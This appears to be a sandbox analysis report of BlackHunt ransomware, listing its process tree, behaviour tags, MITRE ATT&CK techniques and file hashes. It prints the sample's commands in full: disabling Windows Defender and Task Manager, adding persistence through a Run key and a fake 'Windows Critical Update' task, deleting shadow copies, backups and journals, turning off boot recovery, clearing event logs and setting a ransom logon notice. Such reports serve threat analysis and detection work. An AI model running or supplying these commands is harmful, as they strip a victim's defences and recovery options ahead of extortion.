C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1144
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1176
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2140
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2884
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1996
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:740
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:936
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe" /F2⤵PID:2336
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe" /F3⤵
- Creates scheduled task(s)
PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2348
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1596
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1076
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2324
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2272
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2456
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:532
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2960
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2172
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2500
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1712
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1964
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:268
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2872
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2756
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2188
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1156
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2952
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2800
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2108
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2404
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2936
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2948
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2976
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2252
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2232
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:740
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1964
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2964
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1436
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1140
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe"2⤵
- Deletes itself
PID:2728 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2488
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2396
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2160
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5efee3009aaec9133c314a8fe69327b21
SHA11cfd0dbb10e51f5d94485df53f71ce33d3da396e
SHA25609972bdbcd91ea6e41928f971493def5252d31ec0ac8f39656e4529875024e48
SHA51262fcfd0c5e25ebfda47fa9b5edc852a3d56df3be3f486f3adccf24df45c48a73d3ce4a27a4334335eabd840441e965e6835fcc48aea6e6cb236d4960f42964cb
-
Filesize
12KB
MD508fe281b6210b058a680cabb7b3966af
SHA190aba2ea73e5498e96e136dbf74ea385b658b7b2
SHA256c07174ba1b72280bd59b660d4e849de0aebf76ec889670cb6cd50bcaf203b70b
SHA5124ad757c64183baef632a9599e24f33f471db37d0c49552bd73aa1014ed7914718492566ce7b94297a02c21a6e95236db0535291252b8c2da2b54bc93f2e627c2
-
Filesize
684B
MD568bc7bd30d524478827b1848d5bb83e4
SHA1177ed61bd7e8ff8be4082a85ac83dce2bd2fe7de
SHA256ffaf9ccf36e5895b0c82ed7cda444332a8478f4ea50ce727e84011abcfb47235
SHA5129d5c636692f1179fb93c4d43f7d7a48908594874565982c4c724968ac7e29c67f7dcbece8fbf51d54743ea1673b64094d6365eee7b2c1603306972e366f69e7a